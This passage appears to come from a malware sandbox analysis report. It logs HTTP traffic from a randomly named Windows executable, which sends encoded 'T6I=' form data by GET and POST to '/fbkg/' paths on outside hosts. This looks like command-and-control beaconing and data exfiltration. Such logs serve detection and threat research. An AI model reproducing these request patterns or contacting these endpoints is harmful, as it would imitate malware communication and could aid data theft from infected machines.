                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623433113 CET982INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:21 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Sorting-Hat-PodId: 293
                                                                                                                                                                                                X-Sorting-Hat-ShopId: 83935199526
                                                                                                                                                                                                X-Storefront-Renderer-Rendered: 1
                                                                                                                                                                                                Location: https://littlehappiez.com/fbkg?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o6uPmxzzITamFvPAcrLEMG/rHqTHzN/vWA==&Nx1L1=526dgl_phJ
                                                                                                                                                                                                X-Redirect-Reason: https_required
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none';
                                                                                                                                                                                                X-ShopId: 83935199526
                                                                                                                                                                                                X-ShardId: 293
                                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                                powered-by: Shopify
                                                                                                                                                                                                Server-Timing: processing;dur=8, db;dur=4, asn;desc="174", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="vs2p", requestID;desc="21d03879-a327-4172-b18f-380fb32fb3c0"
                                                                                                                                                                                                X-Shopify-Stage: production
                                                                                                                                                                                                X-Dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                                                                                                                                                                X-Request-ID: 21d03879-a327-4172-b18f-380fb32fb3c0
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Download-Options: noopen
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2sIfEKiWMwrPLJM76VujOLJVD1KNPb%2BVem8W3bAe2YqoeqzGYUtgaUeCPM72OJ9k9XpUTPf18wR3IuLGWcrQbOg0QFTLr3wcJzlatXnBkA%2Fvs9l38EmOWGNiylx4
                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623517990 CET983INData Raw: 79 66 39 62 52 53 67 66 31 42 4d 7a 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e
                                                                                                                                                                                                Data Ascii: yf9bRSgf1BMzg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=49.999952Server: cloudflareCF-RAY: 827a0b608d2b5e7a-EWRalt-svc: h3=":44
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623610020 CET983INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                42192.168.11.205016923.227.38.7480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:21.473592043 CET981OUTGET /fbkg/?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o6uPmxzzITamFvPAcrLEMG/rHqTHzN/vWA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.littlehappiez.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623433113 CET982INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:21 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Sorting-Hat-PodId: 293
                                                                                                                                                                                                X-Sorting-Hat-ShopId: 83935199526
                                                                                                                                                                                                X-Storefront-Renderer-Rendered: 1
                                                                                                                                                                                                Location: https://littlehappiez.com/fbkg?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o6uPmxzzITamFvPAcrLEMG/rHqTHzN/vWA==&Nx1L1=526dgl_phJ
                                                                                                                                                                                                X-Redirect-Reason: https_required
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none';
                                                                                                                                                                                                X-ShopId: 83935199526
                                                                                                                                                                                                X-ShardId: 293
                                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                                powered-by: Shopify
                                                                                                                                                                                                Server-Timing: processing;dur=8, db;dur=4, asn;desc="174", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="vs2p", requestID;desc="21d03879-a327-4172-b18f-380fb32fb3c0"
                                                                                                                                                                                                X-Shopify-Stage: production
                                                                                                                                                                                                X-Dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                                                                                                                                                                X-Request-ID: 21d03879-a327-4172-b18f-380fb32fb3c0
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Download-Options: noopen
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2sIfEKiWMwrPLJM76VujOLJVD1KNPb%2BVem8W3bAe2YqoeqzGYUtgaUeCPM72OJ9k9XpUTPf18wR3IuLGWcrQbOg0QFTLr3wcJzlatXnBkA%2Fvs9l38EmOWGNiylx4
                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623517990 CET983INData Raw: 79 66 39 62 52 53 67 66 31 42 4d 7a 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e
                                                                                                                                                                                                Data Ascii: yf9bRSgf1BMzg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=49.999952Server: cloudflareCF-RAY: 827a0b608d2b5e7a-EWRalt-svc: h3=":44
                                                                                                                                                                                                Nov 17, 2023 19:30:21.623610020 CET983INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                43192.168.11.205017045.33.23.18380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:27.001693964 CET984OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.alwayswim.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.alwayswim.com
                                                                                                                                                                                                Referer: http://www.alwayswim.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 41 4e 6f 72 4a 30 66 68 73 46 71 64 71 55 37 39 36 71 45 43 74 66 42 74 53 61 65 53 76 48 7a 43 6d 64 4e 51 56 66 70 4a 4e 50 66 72 79 67 34 63 44 71 6e 44 6a 76 76 37 6e 71 31 32 2b 61 7a 45 68 45 77 41 30 59 42 4f 58 77 54 65 75 46 49 5a 57 32 36 34 42 41 57 5a 57 74 43 43 41 36 72 59 71 39 73 37 51 44 72 79 62 68 6f 2f 57 70 39 77 4e 78 47 46 51 6f 59 51 69 6c 76 4f 36 69 39 2b 39 44 43 7a 63 52 34 6e 48 47 77 35 66 70 4c 73 48 56 52 4a 61 73 48 76 45 6c 46 79 58 50 6c 35 56 75 66 69 71 4a 7a 78 7a 67 77 4f 47 78 6d 53 4c 41 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=ANorJ0fhsFqdqU796qECtfBtSaeSvHzCmdNQVfpJNPfryg4cDqnDjvv7nq12+azEhEwA0YBOXwTeuFIZW264BAWZWtCCA6rYq9s7QDrybho/Wp9wNxGFQoYQilvO6i9+9DCzcR4nHGw5fpLsHVRJasHvElFyXPl5VufiqJzxzgwOGxmSLA==
                                                                                                                                                                                                Nov 17, 2023 19:30:27.145768881 CET985INHTTP/1.1 200 OK
                                                                                                                                                                                                server: openresty/1.13.6.1
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:27 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 31 45 44 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4b 73 d3 30 10 be f7 57 08 1f 3a 30 83 6d c5 21 0f a8 15 a6 94 66 b0 c9 10 06 0a a4 b9 74 14 49 b1 37 95 25 63 cb 76 3d 0c ff 1d 3f 98 c6 10 0e e8 a0 d5 ae f6 f5 7d 2b f9 4f de ae af 6e 6e 3f 5e a3 d8 24 72 71 e6 b7 02 49 aa 22 62 09 65 2d ce 50 b3 fc 58 50 de 1f 3b 35 11 86 22 16 d3 2c 17 86 58 5f 6e 96 f6 fc b7 e7 f1 3a 36 26 b5 c5 f7 02 4a 62 3d d8 05 b5 99 4e 52 6a 60 27 85 85 98 56 46 a8 26 36 b8 26 82 47 e2 24 5a d1 44 10 ab 04 51 a5 3a 33 83 80 0a b8 89 09 17 25 30 61 77 ca 73 04 0a 0c 50 69 e7 8c 4a 41 46 0e 1e a6 33 60 a4 58 f8 6e 2f 3b 38 5d 93 4a e7 2c 83 d4 1c 61 fd bb f7 4c ec 33 91 c7 83 16 f0 45 91 49 d2 e2 7b e5 ba 55 55 cd b0 43 65 45 eb bc 82 c4 69 50 ba 16 72 8f 59 7d f7 b4 92 df 11 38 64 e8 b4 ca e4 bf ab f8 ee 71 3c fe 4e f3 1a 69 25 35 e5 c4 e2 fa ae 3f 3e 7d 36 a4 a4 07 8e 4c 9d 36 1c 1b f1 60 dc 03 2d 69 6f 1d f8 b5 7c ec 0b c5 0c 68 85 06 a9 d0 8f 47 16 5b 97 76 55 a0 b8 ae 1c a3 53 47 6a d6 4c 59 2b 27 6e 30 21 82 ac 23 51 7f d1 b4 df dd 47 af a3 94 8c ce 0f 79 b3 15 05 70 32 9a 61 ec bd 98 cc bd 99 83 31 1e e3 d1 6c 3a 99 9e 6b 13 8b ec 8e 66 51 4e 44 1d 8e 58 72 0f 6b b8 84 95 b7 05 ea 31 58 5d 5d c2 ed 26 54 ac 0e a6 c1 55 d0 e9 2c f9 9a 6c 37 a1 64 d0 da 42 cd df 7d aa d6 30 2f f9 98 8f 57 c9 32 e7 de 72 c2 c6 3c dd 7d 9e 1c 76 1e 2e b7 49 98 6d eb 79 9f eb db 87 c3 76 f3 06 07 07 1d 05 a0 cb f7 10 be b4 2e fe 00 fd f3 51 f3 dd e1 3b f2 dd 76 00 cd 37 72 bb ef f4 0b f6 b6 88 78 5e 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1EDSKs0W:0m!ftI7%cv=?}+Onn?^$rqI"be-PXP;5",X_n:6&Jb=NRj`'VF&6&G$ZDQ:3%0awsPiJAF3`Xn/;8]J,aL3EI{UUCeEiPrY}8dq<Ni%5?>}6L6`-io|hG[vUSGjLY+'n0!#QGyp2a1l:kfQNDXrk1X]]&TU,l7dB}0/W2r<}v.Imyv.Q;v7rx^0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                4345.33.23.18380192.168.11.2050170C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:27.001693964 CET984OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.alwayswim.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.alwayswim.com
                                                                                                                                                                                                Referer: http://www.alwayswim.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 41 4e 6f 72 4a 30 66 68 73 46 71 64 71 55 37 39 36 71 45 43 74 66 42 74 53 61 65 53 76 48 7a 43 6d 64 4e 51 56 66 70 4a 4e 50 66 72 79 67 34 63 44 71 6e 44 6a 76 76 37 6e 71 31 32 2b 61 7a 45 68 45 77 41 30 59 42 4f 58 77 54 65 75 46 49 5a 57 32 36 34 42 41 57 5a 57 74 43 43 41 36 72 59 71 39 73 37 51 44 72 79 62 68 6f 2f 57 70 39 77 4e 78 47 46 51 6f 59 51 69 6c 76 4f 36 69 39 2b 39 44 43 7a 63 52 34 6e 48 47 77 35 66 70 4c 73 48 56 52 4a 61 73 48 76 45 6c 46 79 58 50 6c 35 56 75 66 69 71 4a 7a 78 7a 67 77 4f 47 78 6d 53 4c 41 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=ANorJ0fhsFqdqU796qECtfBtSaeSvHzCmdNQVfpJNPfryg4cDqnDjvv7nq12+azEhEwA0YBOXwTeuFIZW264BAWZWtCCA6rYq9s7QDrybho/Wp9wNxGFQoYQilvO6i9+9DCzcR4nHGw5fpLsHVRJasHvElFyXPl5VufiqJzxzgwOGxmSLA==
                                                                                                                                                                                                Nov 17, 2023 19:30:27.145768881 CET985INHTTP/1.1 200 OK
                                                                                                                                                                                                server: openresty/1.13.6.1
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:27 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 31 45 44 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4b 73 d3 30 10 be f7 57 08 1f 3a 30 83 6d c5 21 0f a8 15 a6 94 66 b0 c9 10 06 0a a4 b9 74 14 49 b1 37 95 25 63 cb 76 3d 0c ff 1d 3f 98 c6 10 0e e8 a0 d5 ae f6 f5 7d 2b f9 4f de ae af 6e 6e 3f 5e a3 d8 24 72 71 e6 b7 02 49 aa 22 62 09 65 2d ce 50 b3 fc 58 50 de 1f 3b 35 11 86 22 16 d3 2c 17 86 58 5f 6e 96 f6 fc b7 e7 f1 3a 36 26 b5 c5 f7 02 4a 62 3d d8 05 b5 99 4e 52 6a 60 27 85 85 98 56 46 a8 26 36 b8 26 82 47 e2 24 5a d1 44 10 ab 04 51 a5 3a 33 83 80 0a b8 89 09 17 25 30 61 77 ca 73 04 0a 0c 50 69 e7 8c 4a 41 46 0e 1e a6 33 60 a4 58 f8 6e 2f 3b 38 5d 93 4a e7 2c 83 d4 1c 61 fd bb f7 4c ec 33 91 c7 83 16 f0 45 91 49 d2 e2 7b e5 ba 55 55 cd b0 43 65 45 eb bc 82 c4 69 50 ba 16 72 8f 59 7d f7 b4 92 df 11 38 64 e8 b4 ca e4 bf ab f8 ee 71 3c fe 4e f3 1a 69 25 35 e5 c4 e2 fa ae 3f 3e 7d 36 a4 a4 07 8e 4c 9d 36 1c 1b f1 60 dc 03 2d 69 6f 1d f8 b5 7c ec 0b c5 0c 68 85 06 a9 d0 8f 47 16 5b 97 76 55 a0 b8 ae 1c a3 53 47 6a d6 4c 59 2b 27 6e 30 21 82 ac 23 51 7f d1 b4 df dd 47 af a3 94 8c ce 0f 79 b3 15 05 70 32 9a 61 ec bd 98 cc bd 99 83 31 1e e3 d1 6c 3a 99 9e 6b 13 8b ec 8e 66 51 4e 44 1d 8e 58 72 0f 6b b8 84 95 b7 05 ea 31 58 5d 5d c2 ed 26 54 ac 0e a6 c1 55 d0 e9 2c f9 9a 6c 37 a1 64 d0 da 42 cd df 7d aa d6 30 2f f9 98 8f 57 c9 32 e7 de 72 c2 c6 3c dd 7d 9e 1c 76 1e 2e b7 49 98 6d eb 79 9f eb db 87 c3 76 f3 06 07 07 1d 05 a0 cb f7 10 be b4 2e fe 00 fd f3 51 f3 dd e1 3b f2 dd 76 00 cd 37 72 bb ef f4 0b f6 b6 88 78 5e 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1EDSKs0W:0m!ftI7%cv=?}+Onn?^$rqI"be-PXP;5",X_n:6&Jb=NRj`'VF&6&G$ZDQ:3%0awsPiJAF3`Xn/;8]J,aL3EI{UUCeEiPrY}8dq<Ni%5?>}6L6`-io|hG[vUSGjLY+'n0!#QGyp2a1l:kfQNDXrk1X]]&TU,l7dB}0/W2r<}v.Imyv.Q;v7rx^0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                4445.33.23.18380192.168.11.2050171C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:29.670878887 CET986OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.alwayswim.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.alwayswim.com
                                                                                                                                                                                                Referer: http://www.alwayswim.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 41 4e 6f 72 4a 30 66 68 73 46 71 64 6f 33 6a 39 38 4a 63 43 6f 2f 42 69 58 61 65 53 39 48 7a 47 6d 64 42 51 56 65 74 5a 4d 38 72 72 79 42 6b 63 52 2b 37 44 6d 76 76 37 79 61 31 7a 36 61 7a 4e 68 45 38 79 30 61 46 4f 58 77 58 65 76 7a 63 5a 44 32 36 2f 4f 51 57 59 47 39 43 50 45 36 71 56 71 39 67 4a 51 43 2f 79 62 52 30 2f 58 72 56 77 49 67 47 45 55 49 5a 62 67 6c 76 4a 6f 69 39 77 39 45 4b 64 63 52 52 61 41 31 73 35 65 49 6e 73 49 31 52 4b 53 63 48 30 62 31 45 53 52 2b 45 50 53 50 54 2b 36 59 54 71 38 55 4e 43 53 68 69 61 59 56 72 63 38 79 38 75 77 39 44 72 6d 50 56 32 74 69 6d 63 6a 70 41 79 31 31 49 41 37 36 75 46 35 6c 6e 56 61 30 7a 6f 6f 39 66 6e 49 37 46 50 58 48 52 4a 43 4d 64 4d 57 48 58 48 57 31 74 55 66 2b 54 68 49 4a 6d 4b 78 77 6e 39 69 6e 36 48 58 65 4c 30 33 71 69 42 34 2b 58 67 36 30 5a 53 73 4f 36 5a 2f 48 4a 50 30 75 59 53 34 76 59 4d 41 32 39 58 41 32 31 34 4d 46 6a 67 79 4a 71 4e 31 32 76 2f 62 31 32 5a 62 4f 35 31 6c 53 2b 76 53 63 51 62 57 66 6d 44 34 41 2f 4d 67 55 4b 4b 45 64 56 70 61 36 57 2b 69 69 41 6a 47 7a 4a 6e 4c 63 53 30 47 72 64 41 39 4f 77 77 4b 74 68 58 7a 77 51 75 5a 64 73 45 63 38 30 5a 2f 4b 46 63 51 4c 79 2f 46 47 2b 4f 6f 4c 4e 78 6d 79 54 6a 5a 30 7a 50 32 6d 61 52 51 4e 67 2b 73 63 6c 38 47 63 39 4e 74 34 39 5a 6b 36 54 52 58 50 4d 68 64 69 64 79 35 33 74 50 66 59 72 77 6e 48 52 73 67 45 38 33 6f 49 46 30 77 6c 50 61 57 68 39 53 4b 42 69 58 4b 4e 32 55 53 48 6b 39 44 4c 54 67 51 4c 5a 39 48 65 37 51 75 31 4e 49 61 30 53 4c 6c 61 52 58 70 66 42 55 79 69 49 46 75 49 4a 71 56 34 30 79 76 67 77 3d
                                                                                                                                                                                                Data Ascii: T6I=ANorJ0fhsFqdo3j98JcCo/BiXaeS9HzGmdBQVetZM8rryBkcR+7Dmvv7ya1z6azNhE8y0aFOXwXevzcZD26/OQWYG9CPE6qVq9gJQC/ybR0/XrVwIgGEUIZbglvJoi9w9EKdcRRaA1s5eInsI1RKScH0b1ESR+EPSPT+6YTq8UNCShiaYVrc8y8uw9DrmPV2timcjpAy11IA76uF5lnVa0zoo9fnI7FPXHRJCMdMWHXHW1tUf+ThIJmKxwn9in6HXeL03qiB4+Xg60ZSsO6Z/HJP0uYS4vYMA29XA214MFjgyJqN12v/b12ZbO51lS+vScQbWfmD4A/MgUKKEdVpa6W+iiAjGzJnLcS0GrdA9OwwKthXzwQuZdsEc80Z/KFcQLy/FG+OoLNxmyTjZ0zP2maRQNg+scl8Gc9Nt49Zk6TRXPMhdidy53tPfYrwnHRsgE83oIF0wlPaWh9SKBiXKN2USHk9DLTgQLZ9He7Qu1NIa0SLlaRXpfBUyiIFuIJqV40yvgw=
                                                                                                                                                                                                Nov 17, 2023 19:30:29.814033985 CET987INHTTP/1.1 200 OK
                                                                                                                                                                                                server: openresty/1.13.6.1
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:29 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 31 45 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4b 73 d3 30 10 be f7 57 08 1f 3a 30 83 2d c7 69 da 84 5a 61 4a 69 06 9b 0c 61 a0 40 9a 4b 47 91 14 7b 53 59 32 b6 6c d7 c3 f0 df f1 83 69 0c e1 80 0e 5a ed 6a 5f df b7 92 ff ec ed ea fa f6 ee e3 0d 8a 4d 22 e7 27 7e 2b 90 a4 2a 22 96 50 d6 fc 04 35 cb 8f 05 e5 fd b1 53 13 61 28 62 31 cd 72 61 88 f5 e5 76 61 4f 7f 7b 1e ae 63 63 52 5b 7c 2f a0 24 d6 a3 5d 50 9b e9 24 a5 06 b6 52 58 88 69 65 84 6a 62 83 1b 22 78 24 8e a2 15 4d 04 b1 4a 10 55 aa 33 33 08 a8 80 9b 98 70 51 02 13 76 a7 bc 44 a0 c0 00 95 76 ce a8 14 64 e4 b8 c3 74 06 8c 14 73 1f f7 b2 83 d3 35 a9 74 ce 32 48 cd 01 d6 bf 7b cf c4 2e 13 79 3c 68 c1 bd 2c 32 49 5a 7c af 30 ae aa ea c2 75 a8 ac 68 9d 57 90 38 0d 4a 6c 21 7c c8 ea e3 e3 4a 7e 47 e0 90 a1 e3 2a 93 ff ae e2 e3 c3 78 fc ad e6 35 d2 4a 6a ca 89 c5 f5 7d 7f 7c fe 62 48 49 0f 1c 99 3a 6d 38 36 e2 d1 e0 3d 2d 69 6f 1d f8 b5 7c ec 0a c5 0c 68 85 06 a9 d0 8f 27 16 5b 97 76 55 a0 b8 ae 1c a3 53 47 6a d6 4c 59 2b 27 6e 30 21 82 ac 03 51 7f d1 b4 db 3e 44 af a3 94 8c 4e f7 79 b3 15 05 70 32 ba 70 5d ef 6c 32 f5 66 8e eb ba e7 67 13 6f 3c 9b 9d 6a 13 8b ec 9e 66 51 4e 44 1d 8e 58 f2 00 2b b8 82 a5 b7 01 ea 31 58 5e 5f c1 dd 3a 54 ac 0e ce 83 eb a0 d3 59 f2 35 d9 ac 43 c9 a0 b5 85 9a bf fb 54 ad 60 5a f2 31 1f 2f 93 45 ce bd c5 84 8d 79 ba fd 3c d9 6f 3d b7 dc 24 61 b6 a9 a7 7d ae 6f 1f f6 9b f5 1b 37 d8 eb 28 00 5d be 87 70 66 5d fe 01 fa e7 93 e6 e3 e1 3b f2 71 3b 80 e6 1b e1 ee 3b fd 02 73 64 80 8d 5e 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1EESKs0W:0-iZaJia@KG{SY2liZj_M"'~+*"P5Sa(b1ravaO{ccR[|/$]P$RXiejb"x$MJU33pQvDvdts5t2H{.y<h,2IZ|0uhW8Jl!|J~G*x5Jj}|bHI:m86=-io|h'[vUSGjLY+'n0!Q>DNyp2p]l2fgo<jfQNDX+1X^_:TY5CT`Z1/Ey<o=$a}o7(]pf];q;;sd^0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                44192.168.11.205017145.33.23.18380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:29.670878887 CET986OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.alwayswim.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.alwayswim.com
                                                                                                                                                                                                Referer: http://www.alwayswim.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
